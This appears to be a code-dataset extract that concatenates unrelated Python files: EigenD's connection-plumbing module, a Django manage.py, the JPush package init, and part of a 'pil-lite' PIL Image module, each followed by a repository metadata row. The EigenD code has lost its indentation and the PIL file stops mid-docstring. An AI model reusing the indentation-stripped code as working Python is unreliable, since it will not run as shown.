connect_isinput(O) :- @name(input,O).
connect_isinput(O) :- @protocol(input,O).
connect_isoutput(O) :- @name(output,O).
connect_isoutput(O) :- @protocol(output,O).
connect_inputs(W,OL) :- @is(OL,$alluniq(O,connect_contains(W,O),connect_isinput(O))).
connect_outputs(W,OL) :- @is(OL,$alluniq(O,connect_contains(W,O),connect_isoutput(O))).
connect_revoutputs(T,OL) :- @is(OL, $alluniq(O,connect_contains(T,O),connect_isoutput(O),@protocol(revconnect,O))).
connect_revinputs(F,OL) :- @is(OL, $alluniq(O,connect_contains(F,O),connect_isinput(O),@protocol(revconnect,O))).
connect_tosplit(T,OOUT,OIN) :- connect_inputs(T,OIN), connect_revoutputs(T,OOUT).
connect_fromsplit(F,OOUT,OIN) :- connect_outputs(F,OOUT), connect_revinputs(F,OIN).
find_connections(F,T,TL) :- @is(TL,$alluniq(O,connect_contains(T,O),@master(O,OM),connect_contains(F,OM))).
dump_contains(O,P) :- @assocwith_extended(PP,O), @partof(P,PP).
dump_connections0(P,T,P) :- @master(P,T).
dump_connections0(P,P,T) :- @master(T,P).
dump_connections(O,F,T) :- dump_contains(O,P),dump_connections0(P,F,T).
dump_connections(O,F,T) :- dump_connections0(O,F,T).
unconnect_candidate(T,[O,OM]) :- connect_contains(T,O),connect_isinput(O),@master(O,OM).
unconnect_candidate(T,[OM,O]) :- connect_contains(T,O),connect_isoutput(O),@protocol(revconnect,O),@master(OM,O).
unconnect_list(T,L) :- @is(L,$alluniq(O,unconnect_candidate(T,O))).
input_list_candidate(T,O) :- connect_contains(T,O),connect_isinput(O).
input_list_candidate(T,O) :- connect_contains(T,O),connect_isoutput(O),@protocol(revconnect,O).
input_list(T,L) :- @is(L,$alluniq([O,None],input_list_candidate(T,O))).
unconnect_from_candidate(T,F,[O,OM]) :- connect_contains(T,O),connect_isinput(O),@master(O,OM), connect_contains(F,OM).
unconnect_from_candidate(T,F,[OM,O]) :- connect_contains(T,O),connect_isoutput(O),@protocol(revconnect,O),@master(OM,O), connect_contains(F,OM).
unconnect_from_list(T,F,L) :- @is(L,$alluniq(O,unconnect_from_candidate(T,F,O))).
"""
class Stuff:
def __init__(self,id,words,ordinal=None,domain=None,channel=None,**extra):
self.id=id
self.words=words
self.ordinal=ordinal
self.domain=domain or domain.Null()
self.channel=channel
self.extra=extra
def get(self,key,val=None):
return self.extra.get(key,val)
def target(self,src,u):
return logic.render_term(logic.make_term('conn',u,self.channel,src.id,src.channel))
def __repr__(self):
return '<%s %s %s>' % (self.id,self.channel,self.words)
def __str__(self):
return repr(self)
class WordTable(dict):
def __init__(self,*words):
dict.__init__(self)
self.add(*words)
def add(self,*words):
for w in words:
w,s = self.__score(w)
self[w] = self.setdefault(w,0) + s
def __score(self,w):
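        # leading '+' characters increase a word's weight, leading '-' characters
        # make it count negatively; a plain word scores 1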
mw,ml = self.__countstart(w,'+')
lw,ll = self.__countstart(w,'-')
if ml:
return mw,ml
if ll:
return lw,-ll
return w,1
def __countstart(self,w,c):
s = w.lstrip(c)
return s,len(w)-len(s)
def find_conn(aproxy,id):
cnxs = logic.parse_clauselist(aproxy.get_master())
r = []
for cnx in cnxs:
if logic.is_pred_arity(cnx,'conn',4) and cnx.args[2]==id:
r.append(logic.render_term(cnx))
return r
class Plumber(agent.Agent):
def __init__(self,master_agent,database,ordinal):
self.database = database
self.master_agent = master_agent
agent.Agent.__init__(self,names='plumber',subsystem='plumber',signature=version,container=1,protocols='is_subsys',ordinal=ordinal)
self.add_verb2(20,'connect([],None,role(None,[or([concrete],[composite([descriptor])])]),role(to,[concrete,singular]),option(using,[numeric,singular]))',self.verb_20_connect)
self.add_verb2(25,'connect([],None,role(None,[concrete,singular]))',self.verb_25_connect)
self.add_verb2(18,'connect([un],None,role(None,[concrete]))',self.verb_18_unconnect)
self.add_verb2(19,'connect([un],None,role(None,[concrete]),role(from,[concrete,singular]))',self.verb_19_unconnect_from)
self.add_verb2(12,'insert([],None,role(None,[concrete,singular]),role(to,[concrete,singular]))',self.verb_12_insert)
self.add_verb2(13,'insert([un],None,role(None,[concrete,singular]))',self.verb_13_uninsert)
def verb_12_insert(self,subject,i,o):
i = action.concrete_object(i)
o = action.concrete_object(o)
proxy = self.database.find_item(o)
if not proxy:
return async.failure('internal error: no proxy')
proxy.set_insert(i)
def verb_13_uninsert(self,subject,o):
o = action.concrete_object(o)
proxy = self.database.find_item(o)
if not proxy:
return async.failure('internal error: no proxy')
proxy.set_insert('')
@async.coroutine('internal error')
def __unconnect_from(self,t,tproxy,f):
objs = self.database.search_any_key('W',T('unconnect_from_list',t,f,V('W')))
for (s,m) in objs:
sproxy = self.database.find_item(s)
sconn = find_conn(sproxy,m)
for c in sconn:
print 'disconnect',c,'from',s
yield interpreter.RpcAdapter(sproxy.invoke_rpc('disconnect',c))
yield async.Coroutine.success()
@async.coroutine('internal error')
def __unconnect(self,t,tproxy):
print '__unconnect',t
objs = self.database.search_any_key('W',T('input_list',t,V('W')))
print '__unconnect',t,objs
for (s,m) in objs:
sproxy = self.database.find_item(s)
#sconn = self.find_conn(sproxy,m)
#for c in sconn:
# print 'disconnect',c,'from',s
# yield interpreter.RpcAdapter(sproxy.invoke_rpc('disconnect',c))
yield interpreter.RpcAdapter(sproxy.invoke_rpc('clrconnect',''))
yield async.Coroutine.success()
@async.coroutine('internal error')
def __unconnect_inputlist_from(self,t,tproxy,f):
print 'deleting',f,'inputs from',t
inputs = yield interpreter.RpcAdapter(tproxy.invoke_rpc('lstinput',''))
inputs = action.unmarshal(inputs)
print 'candidate inputs are:',inputs
for input in inputs:
print 'unconnecting',input
iproxy = self.database.find_item(input)
objs = self.database.search_any_key('W',T('unconnect_from_list',input,f,V('W')))
if objs:
yield self.__unconnect(input,iproxy)
print 'deleting input',input
yield interpreter.RpcAdapter(tproxy.invoke_rpc('delinput',input))
yield async.Coroutine.success()
@async.coroutine('internal error')
def __unconnect_inputlist(self,t,tproxy):
print 'deleting all inputs from',t
inputs = yield interpreter.RpcAdapter(tproxy.invoke_rpc('lstinput',''))
inputs = action.unmarshal(inputs)
print 'candidate inputs are:',inputs
for input in inputs:
print 'unconnecting',input
iproxy = self.database.find_item(input)
yield self.__unconnect(input,iproxy)
print 'deleting input',input
yield interpreter.RpcAdapter(tproxy.invoke_rpc('delinput',input))
yield async.Coroutine.success()
def verb_25_connect(self,subject,t):
t = action.concrete_object(t)
print 'dump connect',t
rv = self.get_connections(t)
for r in rv:
print r
def get_connections(self,id):
rv = []
db = self.database
for e in db.search(T('dump_connections',id,V('F'),V('T'))):
f = e['F']
t = e['T']
fd = db.find_full_desc(f) or f
td = db.find_full_desc(t) or t
us = db.get_inputs_channels(t,f)
for (u,c) in us:
d = '%s -> %s' % (fd,td)
if c: d = d+' channel %s' % (c)
if u: d = d+' using %s' % (u)
rv.append(d)
return rv
def verb_18_unconnect(self,subject,t):
print 'un connect',t
t = action.concrete_object(t)
tproxy = self.database.find_item(t)
if 'inputlist' in tproxy.protocols():
return self.__unconnect_inputlist(t,tproxy)
else:
return self.__unconnect(t,tproxy)
def verb_19_unconnect_from(self,subject,t,f):
f = action.concrete_object(f)
t = action.concrete_object(t)
print 'un connect',t,'from',f
tproxy = self.database.find_item(t)
if 'inputlist' in tproxy.protocols():
return self.__unconnect_inputlist_from(t,tproxy,f)
else:
return self.__unconnect_from(t,tproxy,f)
@async.coroutine('internal error')
def __connect_inner(self,t,f,u=None):
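        # gather normal and reverse-connect endpoints on both sides, pick a free
        # 'using' index when requested, then pair each input with its best-scoring
        # output and make those connections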
normoutputs = []
revoutputs = []
norminputs = []
revinputs = []
d = self.database.search_any(T('connect_tosplit',t,V('OOUT'),V('OIN')))
norminputs.extend([ self.__stuff(o) for o in d['OIN'] ])
revoutputs.extend([ self.__stuff(o) for o in d['OOUT'] ])
if action.is_concrete(f):
f = action.crack_concrete(f)
d = self.database.search_any(T('connect_fromsplit',f,V('OOUT'),V('OIN')))
revinputs.extend([ self.__stuff(o) for o in d['OIN'] ])
normoutputs.extend([ self.__stuff(o) for o in d['OOUT'] ])
else:
f = action.crack_composite(f,action.crack_descriptor)
print 'from=',f
for o,p in f:
d =self.database.search_any(T('connect_fromsplit',o,V('OOUT'),V('OIN')))
if d.get('OIN'):
revinputs.append(self.__stuff(o,channel=p))
else:
normoutputs.append(self.__stuff(o,channel=p))
print 'ni=',norminputs
print 'ro=',revoutputs
print 'no=',normoutputs
print 'ri=',revinputs
print 'u=',u
allinputs = norminputs+revinputs
alloutputs = normoutputs+revoutputs
if u is True:
iix = set()
for ii in allinputs:
iim = self.database.find_masters(ii.id)
for ii2 in iim:
iixm = self.database.get_inputs(ii.id,ii2)
iix = iix.union(iixm)
u = 1+reduce(max,iix,0)
print 'using',u,iix
if u == 0:
u = None
if len(allinputs)==1 and len(alloutputs)==1:
print 'direct connect'
self.__connect(alloutputs[0],allinputs[0],u)
yield async.Coroutine.success()
connections = []
for i in norminputs:
scores = {}
for o in normoutputs:
s = self.__score(o,i)
print o.id,'->',i.id,'score',s
if s[0]>0:
scores[s] = o
if not scores:
print i.id,'no inputs'
continue
best = max(scores.keys())
o = scores[best]
connections.append((o,i))
for i in revinputs:
scores = {}
for o in revoutputs:
s = self.__score(o,i)
print o.id,'->',i.id,'score',s
if s[0]>0:
scores[s] = o
if not scores:
print i.id,'no inputs'
continue
best = max(scores.keys())
o = scores[best]
connections.append((o,i))
if not connections:
yield async.Coroutine.failure('incompatible')
for (o,i) in connections:
self.__connect(o,i,u)
yield async.Coroutine.success()
@async.coroutine('internal error')
def __connect_outer(self,tproxy,f,u=None):
ret = [ ]
if 'inputlist' in tproxy.protocols() and u is not None:
yield async.Coroutine.failure('using and inputlist incompatible')
for f in action.arg_objects(f):
if 'inputlist' in tproxy.protocols():
ar = tproxy.invoke_rpc('addinput','')
yield ar
if not ar.status():
yield async.Coroutine.failure('addinput failed')
(t,n) = action.unmarshal(ar.args()[0])
print 'input list connect: new input is',t,n,'resyncing'
yield self.database.sync()
print 'resync complete'
if n:
ret.append(action.initialise_return(t))
etproxy = self.database.find_item(t)
else:
t = tproxy.id()
etproxy = tproxy
if u is None:
if 'using' in etproxy.protocols():
u=True
print 'connect2 from:',f
print '- to:',t
print '- using:',u
r = self.__connect_inner(t,f,u)
yield r
if not r.status():
yield async.Coroutine.failure(*r.args(),**r.kwds())
yield async.Coroutine.success(tuple(ret))
def verb_20_connect(self,subject,f,t,u):
if u is not None:
u=int(action.abstract_string(u))
t = action.concrete_object(t)
tproxy = self.database.find_item(t)
return self.__connect_outer(tproxy,f,u)
def __stuff(self,o,**extra):
proxy = self.database.find_item(o)
words = WordTable()
words.add(*[n for n in proxy.names() if n not in ['input','output']])
words.add(*proxy.fuzzy())
return Stuff(o,words,ordinal=proxy.ordinal(),domain=proxy.domain(),proxy=proxy,**extra)
def __score(self,ostuff,istuff):
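        # rank an output/input pairing by word overlap, then matching ordinals, then
        # domain compatibility; the tuples compare lexicographically, so max() picks
        # the best candidate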
ws = self.__score_words(ostuff.words,istuff.words)
os = self.__score_ordinals(ostuff.ordinal,istuff.ordinal)
ds = self.__score_domains(ostuff.domain,istuff.domain)
return (ws,os,ds)
def __score_words(self,owords,iwords):
s = 0
iw = set(iwords.keys())
ow = set(owords.keys())
if iw==ow:
return 5
both = ow.intersection(iw)
for w in both:
so = owords[w]
si = iwords[w]
ws = cmp(so,0)*cmp(si,0)*(abs(so)+abs(si))
s += ws
return s
def __score_domains(self,odomain,idomain):
if isinstance(odomain,domain.Null):
return -10
if isinstance(idomain,domain.Null):
return -10
if odomain.iso() and idomain==domain.BoundedFloat(-1,1):
return 2
return 0
def __score_ordinals(self,oord,iord):
if oord is not None and iord is not None and oord==iord:
return 1
return 0
def __connect(self,ostuff,istuff,u):
channel = ostuff.get('channel',None)
d=istuff.target(ostuff,u)
print 'connecting',d,'->',istuff.id,'using',u
istuff.get('proxy').invoke_rpc('connect',d)
@async.coroutine('internal error')
def unconnect_set(db,objs):
cnx=[]
for o in objs:
cn = db.get_subsys_masters(o)
for (ss,cl) in cn.items():
print o,ss,cl
if ss not in objs:
for c in cl:
cnx.append(c)
for (m,s) in cnx:
print m,'->',s
sproxy = db.find_item(s)
sconn = find_conn(sproxy,m)
for c in sconn:
print 'disconnect',c,'from',s
yield interpreter.RpcAdapter(sproxy.invoke_rpc('disconnect',c))
| Eigenlabs/EigenD | plg_language/builtin_conn.py | Python | gpl-3.0 | 16,737 |
#!/usr/bin/env python
import os
import sys
if __name__ == "__main__":
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "punctuil_django.settings")
from django.core.management import execute_from_command_line
execute_from_command_line(sys.argv)
| codefortulsa/punctuil | manage.py | Python | apache-2.0 | 258 |
"""Python package for using the JPush API"""
from .core import JPush
from .common import JPushFailure, Unauthorized
from .push import (
Push,
all_,
tag,
tag_and,
alias,
registration_id,
notification,
ios,
android,
winphone,
platform,
audience,
options,
message,
smsmessage,
)
from .device import (
Device,
add,
remove,
device_tag,
device_alias,
device_regid,
device_mobile,
)
from .report import (
Report,
ReportResponse,
)
from .schedule import (
Schedule,
schedulepayload,
)
__all__ = [
    'JPush',
    'JPushFailure',
    'Unauthorized',
    'all_',
    'Push',
    'tag',
    'tag_and',
    'alias',
    'registration_id',
    'notification',
    'ios',
    'android',
    'winphone',
    'message',
    'smsmessage',
    'platform',
    'audience',
    'options',
    'Device',
    'add',
    'remove',
    'device_tag',
    'device_alias',
    'device_regid',
    'Report',
    'ReportResponse',
    'Schedule',
    'schedulepayload',
]
__version__ = '3.2.1'
VERSION = tuple(map(int, __version__.split('.')))
# Silence urllib3 INFO logging by default
import logging
logging.getLogger('requests.packages.urllib3.connectionpool').setLevel(logging.WARNING)
| jpush/jbox | Server/venv/lib/python3.5/site-packages/jpush/__init__.py | Python | mit | 1,298 |
#
# The Python Imaging Library.
# $Id: Image.py 2812 2006-10-07 10:08:37Z fredrik $
#
# the Image class wrapper
#
# partial release history:
# 1995-09-09 fl Created
# 1996-03-11 fl PIL release 0.0 (proof of concept)
# 1996-04-30 fl PIL release 0.1b1
# 1999-07-28 fl PIL release 1.0 final
# 2000-06-07 fl PIL release 1.1
# 2000-10-20 fl PIL release 1.1.1
# 2001-05-07 fl PIL release 1.1.2
# 2002-03-15 fl PIL release 1.1.3
# 2003-05-10 fl PIL release 1.1.4
# 2005-03-28 fl PIL release 1.1.5
# 2006-10-07 fl PIL release 1.1.6b2
#
# Copyright (c) 1997-2006 by Secret Labs AB. All rights reserved.
# Copyright (c) 1995-2006 by Fredrik Lundh.
#
# See the README file for information on usage and redistribution.
#
VERSION = "pil-lite"
try:
import warnings
except ImportError:
warnings = None
class _imaging_not_installed:
# module placeholder
def __getattr__(self, id):
raise ImportError("The _imaging C module is not installed")
try:
# If the _imaging C module is not present, you can still use
# the "open" function to identify files, but you cannot load
# them. Note that other modules should not refer to _imaging
# directly; import Image and use the Image.core variable instead.
import _imaging
core = _imaging
del _imaging
except ImportError, v:
core = _imaging_not_installed()
if str(v)[:20] == "Module use of python" and warnings:
# The _imaging C module is present, but not compiled for
# the right version (windows only). Print a warning, if
# possible.
warnings.warn(
"The _imaging extension was built for another version "
"of Python; most PIL functions will be disabled",
RuntimeWarning
)
import ImageMode
import ImagePalette
import os, string, sys
# type stuff
from types import IntType, StringType, TupleType
try:
UnicodeStringType = type(unicode(""))
##
# (Internal) Checks if an object is a string. If the current
# Python version supports Unicode, this checks for both 8-bit
# and Unicode strings.
def isStringType(t):
return isinstance(t, StringType) or isinstance(t, UnicodeStringType)
except NameError:
def isStringType(t):
return isinstance(t, StringType)
##
# (Internal) Checks if an object is a tuple.
def isTupleType(t):
return isinstance(t, TupleType)
##
# (Internal) Checks if an object is an image object.
def isImageType(t):
return hasattr(t, "im")
##
# (Internal) Checks if an object is a string, and that it points to a
# directory.
def isDirectory(f):
return isStringType(f) and os.path.isdir(f)
from operator import isNumberType, isSequenceType
#
# Debug level
DEBUG = 0
#
# Constants (also defined in _imagingmodule.c!)
NONE = 0
# palettes/quantizers
WEB = 0
ADAPTIVE = 1
# categories
NORMAL = 0
SEQUENCE = 1
CONTAINER = 2
# --------------------------------------------------------------------
# Registries
ID = []
OPEN = {}
MIME = {}
SAVE = {}
EXTENSION = {}
# --------------------------------------------------------------------
# Modes supported by this version
_MODEINFO = {
# NOTE: this table will be removed in future versions. use
# getmode* functions or ImageMode descriptors instead.
# official modes
"1": ("L", "L", ("1",)),
"L": ("L", "L", ("L",)),
"I": ("L", "I", ("I",)),
"F": ("L", "F", ("F",)),
"P": ("RGB", "L", ("P",)),
"RGB": ("RGB", "L", ("R", "G", "B")),
"RGBX": ("RGB", "L", ("R", "G", "B", "X")),
"RGBA": ("RGB", "L", ("R", "G", "B", "A")),
"CMYK": ("RGB", "L", ("C", "M", "Y", "K")),
"YCbCr": ("RGB", "L", ("Y", "Cb", "Cr")),
# Experimental modes include I;16, I;16B, RGBa, BGR;15,
# and BGR;24. Use these modes only if you know exactly
# what you're doing...
}
if sys.byteorder == 'little':
_ARRAY_ENDIAN = '<'
else:
_ARRAY_ENDIAN = '>'
_MODE_CONV = {
# official modes
"1": ('t8', None),
"L": ('|u1', None,),
"S": ('%su2' % _ARRAY_ENDIAN, None ),
"I": ('%si4' % _ARRAY_ENDIAN, None ),
"F": ('%sf4' % _ARRAY_ENDIAN, None),
"P": ('|u1', None),
"RGB": ('|u1', 3),
"RGBX": ('|u1', 4),
"RGBA": ('|u1', 4),
"CMYK": ('|u1', 4),
"YCbCr": ('|u1', 4),
}
def _conv_type_shape(im):
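    # map an image to the (shape, typestr) pair exposed through the numpy
    # __array_interface__ (see Image.__getattr__ below)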
shape = im.size[::-1]
typ, extra = _MODE_CONV[im.mode]
if extra is None:
return shape, typ
else:
return shape+(extra,), typ
MODES = _MODEINFO.keys()
MODES.sort()
# raw modes that may be memory mapped. NOTE: if you change this, you
# may have to modify the stride calculation in map.c too!
_MAPMODES = ("L", "P", "RGBX", "RGBA", "CMYK", "S")
##
# Gets the "base" mode for given mode. This function returns "L" for
# images that contain grayscale data, and "RGB" for images that
# contain color data.
#
# @param mode Input mode.
# @return "L" or "RGB".
# @exception KeyError If the input mode was not a standard mode.
def getmodebase(mode):
return ImageMode.getmode(mode).basemode
##
# Gets the storage type mode. Given a mode, this function returns a
# single-layer mode suitable for storing individual bands.
#
# @param mode Input mode.
# @return "L", "I", or "F".
# @exception KeyError If the input mode was not a standard mode.
def getmodetype(mode):
return ImageMode.getmode(mode).basetype
##
# Gets a list of individual band names. Given a mode, this function
# returns a tuple containing the names of individual bands (use
# {@link #getmodetype} to get the mode used to store each individual
# band.
#
# @param mode Input mode.
# @return A tuple containing band names. The length of the tuple
# gives the number of bands in an image of the given mode.
# @exception KeyError If the input mode was not a standard mode.
def getmodebandnames(mode):
return ImageMode.getmode(mode).bands
##
# Gets the number of individual bands for this mode.
#
# @param mode Input mode.
# @return The number of bands in this mode.
# @exception KeyError If the input mode was not a standard mode.
def getmodebands(mode):
return len(ImageMode.getmode(mode).bands)
# --------------------------------------------------------------------
# Helpers
_initialized = 0
##
# Explicitly loads standard file format drivers.
def preinit():
"Load standard file format drivers."
global _initialized
if _initialized >= 1:
return
try:
import BmpImagePlugin
except ImportError:
pass
try:
import GifImagePlugin
except ImportError:
pass
try:
import JpegImagePlugin
except ImportError:
pass
try:
import PpmImagePlugin
except ImportError:
pass
try:
import PngImagePlugin
except ImportError:
pass
# try:
# import TiffImagePlugin
# except ImportError:
# pass
_initialized = 1
##
# Explicitly initializes the Python Imaging Library. This function
# loads all available file format drivers.
def init():
"Load all file format drivers."
global _initialized
if _initialized >= 2:
return
visited = {}
directories = sys.path
try:
directories = directories + [os.path.dirname(__file__)]
except NameError:
pass
# only check directories (including current, if present in the path)
for directory in filter(isDirectory, directories):
fullpath = os.path.abspath(directory)
if visited.has_key(fullpath):
continue
for file in os.listdir(directory):
if file[-14:] == "ImagePlugin.py":
f, e = os.path.splitext(file)
try:
sys.path.insert(0, directory)
try:
__import__(f, globals(), locals(), [])
finally:
del sys.path[0]
except ImportError:
if DEBUG:
print "Image: failed to import",
print f, ":", sys.exc_value
visited[fullpath] = None
if OPEN or SAVE:
_initialized = 2
# --------------------------------------------------------------------
# Codec factories (used by tostring/fromstring and ImageFile.load)
def _getdecoder(mode, decoder_name, args, extra=()):
# tweak arguments
if args is None:
args = ()
elif not isTupleType(args):
args = (args,)
try:
# get decoder
decoder = getattr(core, decoder_name + "_decoder")
# print decoder, (mode,) + args + extra
return apply(decoder, (mode,) + args + extra)
except AttributeError:
raise IOError("decoder %s not available" % decoder_name)
def _getencoder(mode, encoder_name, args, extra=()):
# tweak arguments
if args is None:
args = ()
elif not isTupleType(args):
args = (args,)
try:
# get encoder
encoder = getattr(core, encoder_name + "_encoder")
# print encoder, (mode,) + args + extra
return apply(encoder, (mode,) + args + extra)
except AttributeError:
raise IOError("encoder %s not available" % encoder_name)
# --------------------------------------------------------------------
# Implementation wrapper
##
# This class represents an image object. To create Image objects, use
# the appropriate factory functions. There's hardly ever any reason
# to call the Image constructor directly.
#
# @see #open
# @see #new
# @see #fromstring
class Image:
format = None
format_description = None
def __init__(self):
self.im = None
self.mode = ""
self.size = (0, 0)
self.palette = None
self.info = {}
self.category = NORMAL
self.readonly = 0
def _new(self, im):
new = Image()
new.im = im
new.mode = im.mode
new.size = im.size
new.palette = self.palette
if im.mode == "P":
new.palette = ImagePalette.ImagePalette()
try:
new.info = self.info.copy()
except AttributeError:
# fallback (pre-1.5.2)
new.info = {}
for k, v in self.info:
new.info[k] = v
return new
_makeself = _new # compatibility
def _copy(self):
self.load()
self.im = self.im.copy()
self.readonly = 0
def _dump(self, file=None, format='png'):
import tempfile
if not file:
file = tempfile.mktemp()
self.load()
file = file + "." + format
self.save(file, format)
return file
def __getattr__(self, name):
if name == "__array_interface__":
# numpy array interface support
new = {}
shape, typestr = _conv_type_shape(self)
new['shape'] = shape
new['typestr'] = typestr
new['data'] = self.tostring()
return new
raise AttributeError(name)
##
# Returns a string containing pixel data.
#
# @param encoder_name What encoder to use. The default is to
# use the standard "raw" encoder.
# @param *args Extra arguments to the encoder.
# @return An 8-bit string.
def tostring(self, encoder_name="raw", *args):
"Return image as a binary string"
# may pass tuple instead of argument list
if len(args) == 1 and isTupleType(args[0]):
args = args[0]
if encoder_name == "raw" and args == ():
args = self.mode
self.load()
# unpack data
e = _getencoder(self.mode, encoder_name, args)
e.setimage(self.im)
bufsize = max(65536, self.size[0] * 4) # see RawEncode.c
data = []
while 1:
l, s, d = e.encode(bufsize)
data.append(d)
if s:
break
if s < 0:
raise RuntimeError("encoder error %d in tostring" % s)
return string.join(data, "")
##
# Loads this image with pixel data from a string.
# <p>
# This method is similar to the {@link #fromstring} function, but
# loads data into this image instead of creating a new image
# object.
def fromstring(self, data, decoder_name="raw", *args):
"Load data to image from binary string"
# may pass tuple instead of argument list
if len(args) == 1 and isTupleType(args[0]):
args = args[0]
# default format
if decoder_name == "raw" and args == ():
args = self.mode
# unpack data
d = _getdecoder(self.mode, decoder_name, args)
d.setimage(self.im)
s = d.decode(data)
if s[0] >= 0:
raise ValueError("not enough image data")
if s[1] != 0:
raise ValueError("cannot decode image data")
##
# Allocates storage for the image and loads the pixel data. In
# normal cases, you don't need to call this method, since the
# Image class automatically loads an opened image when it is
# accessed for the first time.
#
def load(self):
"Explicitly load pixel data."
if self.im and self.palette and self.palette.dirty:
# realize palette
apply(self.im.putpalette, self.palette.getdata())
self.palette.dirty = 0
self.palette.mode = "RGB"
self.palette.rawmode = None
if self.info.has_key("transparency"):
self.im.putpalettealpha(self.info["transparency"], 0)
self.palette.mode = "RGBA"
##
# Verifies the contents of a file. For data read from a file, this
# method attempts to determine if the file is broken, without
# actually decoding the image data. If this method finds any
# problems, it raises suitable exceptions. If you need to load
# the image after using this method, you must reopen the image
# file.
def verify(self):
"Verify file contents."
pass
##
# Copies this image. Use this method if you wish to paste things
# into an image, but still retain the original.
#
# @return An Image object.
def copy(self):
"Copy raster data"
self.load()
im = self.im.copy()
return self._new(im)
##
# Configures the image file loader so it returns a version of the
# image that as closely as possible matches the given mode and
# size. For example, you can use this method to convert a colour
# JPEG to greyscale while loading it, or to extract a 128x192
# version from a PCD file.
# <p>
# Note that this method modifies the Image object in place. If
# the image has already been loaded, this method has no effect.
#
# @param mode The requested mode.
# @param size The requested size.
def draft(self, mode, size):
"Configure image decoder"
pass
##
# Returns a tuple containing the name of each band in this image.
# For example, <b>getbands</b> on an RGB image returns ("R", "G", "B").
#
# @return A tuple containing band names.
def getbands(self):
"Get band names"
return ImageMode.getmode(self.mode).bands
##
# Returns a PyCObject that points to the internal image memory.
#
# @return A PyCObject object.
def getim(self):
"Get PyCObject pointer to internal image memory"
self.load()
return self.im.ptr
##
# Returns the image palette as a list.
#
# @return A list of color values [r, g, b, ...], or None if the
# image has no palette.
def getpalette(self):
"Get palette contents."
self.load()
try:
return map(ord, self.im.getpalette())
except ValueError:
return None # no palette
##
# Adds or replaces the alpha layer in this image. If the image
# does not have an alpha layer, it's converted to "LA" or "RGBA".
# The new layer must be either "L" or "1".
#
# @param im The new alpha layer. This can either be an "L" or "1"
# image having the same size as this image, or an integer or
# other color value.
def putalpha(self, alpha):
"Set alpha layer"
self.load()
if self.readonly:
self._copy()
if self.mode not in ("LA", "RGBA"):
# attempt to promote self to a matching alpha mode
try:
mode = getmodebase(self.mode) + "A"
try:
self.im.setmode(mode)
except (AttributeError, ValueError):
# do things the hard way
im = self.im.convert(mode)
if im.mode not in ("LA", "RGBA"):
raise ValueError # sanity check
self.im = im
self.mode = self.im.mode
except (KeyError, ValueError):
raise ValueError("illegal image mode")
if self.mode == "LA":
band = 1
else:
band = 3
if isImageType(alpha):
# alpha layer
if alpha.mode not in ("1", "L"):
raise ValueError("illegal image mode")
alpha.load()
if alpha.mode == "1":
alpha = alpha.convert("L")
else:
# constant alpha
try:
self.im.fillband(band, alpha)
except (AttributeError, ValueError):
# do things the hard way
alpha = new("L", self.size, alpha)
else:
return
self.im.putband(alpha.im, band)
##
# Attaches a palette to this image. The image must be a "P" or
# "L" image, and the palette sequence must contain 768 integer
    # values, where each group of three values represents the red,
# green, and blue values for the corresponding pixel
# index. Instead of an integer sequence, you can use an 8-bit
# string.
#
# @def putpalette(data)
# @param data A palette sequence (either a list or a string).
def putpalette(self, data, rawmode="RGB"):
"Put palette data into an image."
self.load()
if self.mode not in ("L", "P"):
raise ValueError("illegal image mode")
if not isStringType(data):
data = string.join(map(chr, data), "")
self.mode = "P"
self.palette = ImagePalette.raw(rawmode, data)
self.palette.mode = "RGB"
self.load() # install new palette
##
# Saves this image under the given filename. If no format is
# specified, the format to use is determined from the filename
# extension, if possible.
# <p>
# Keyword options can be used to provide additional instructions
# to the writer. If a writer doesn't recognise an option, it is
# silently ignored. The available options are described later in
# this handbook.
# <p>
# You can use a file object instead of a filename. In this case,
# you must always specify the format. The file object must
# implement the <b>seek</b>, <b>tell</b>, and <b>write</b>
# methods, and be opened in binary mode.
#
# @def save(file, format=None, **options)
# @param file File name or file object.
# @param format Optional format override. If omitted, the
# format to use is determined from the filename extension.
# If a file object was used instead of a filename, this
# parameter should always be used.
# @param **options Extra parameters to the image writer.
# @return None
# @exception KeyError If the output format could not be determined
# from the file name. Use the format option to solve this.
# @exception IOError If the file could not be written. The file
# may have been created, and may contain partial data.
def save(self, fp, format=None, **params):
"Save image to file or stream"
if isStringType(fp):
filename = fp
else:
if hasattr(fp, "name") and isStringType(fp.name):
filename = fp.name
else:
filename = ""
# may mutate self!
self.load()
self.encoderinfo = params
self.encoderconfig = ()
preinit()
ext = string.lower(os.path.splitext(filename)[1])
if not format:
try:
format = EXTENSION[ext]
except KeyError:
init()
try:
format = EXTENSION[ext]
except KeyError:
raise KeyError(ext) # unknown extension
try:
save_handler = SAVE[string.upper(format)]
except KeyError:
init()
save_handler = SAVE[string.upper(format)] # unknown format
if isStringType(fp):
import __builtin__
fp = __builtin__.open(fp, "wb")
close = 1
else:
close = 0
try:
save_handler(self, fp, filename)
finally:
# do what we can to clean up
if close:
fp.close()
##
# Seeks to the given frame in this sequence file. If you seek
# beyond the end of the sequence, the method raises an
# <b>EOFError</b> exception. When a sequence file is opened, the
# library automatically seeks to frame 0.
# <p>
# Note that in the current version of the library, most sequence
    # formats only allow you to seek to the next frame.
#
# @param frame Frame number, starting at 0.
# @exception EOFError If the call attempts to seek beyond the end
# of the sequence.
# @see #Image.tell
def seek(self, frame):
"Seek to given frame in sequence file"
# overridden by file handlers
if frame != 0:
raise EOFError
##
# Split this image into individual bands. This method returns a
# tuple of individual image bands from an image. For example,
# splitting an "RGB" image creates three new images each
# containing a copy of one of the original bands (red, green,
# blue).
#
# @return A tuple containing bands.
def split(self):
"Split image into bands"
ims = []
self.load()
for i in range(self.im.bands):
ims.append(self._new(self.im.getband(i)))
return tuple(ims)
##
# Returns the current frame number.
#
# @return Frame number, starting with 0.
# @see #Image.seek
def tell(self):
"Return current frame number"
return 0
##
# Creates a new image with the given mode and size.
#
# @param mode The mode to use for the new image.
# @param size A 2-tuple, containing (width, height) in pixels.
# @return An Image object.
def new(mode, size):
"Create a new image"
return Image()._new(core.new(mode, size))
##
# Creates an image memory from pixel data in a string.
# <p>
# In its simplest form, this function takes three arguments
# (mode, size, and unpacked pixel data).
# <p>
# You can also use any pixel decoder supported by PIL. For more
# information on available decoders, see the section <a
# href="pil-decoder.htm"><i>Writing Your Own File Decoder</i></a>.
# <p>
# Note that this function decodes pixel data only, not entire images.
# If you have an entire image in a string, wrap it in a
# <b>StringIO</b> object, and use {@link #open} to load it.
#
# @param mode The image mode.
# @param size The image size.
# @param data An 8-bit string containing raw data for the given mode.
# @param decoder_name What decoder to use.
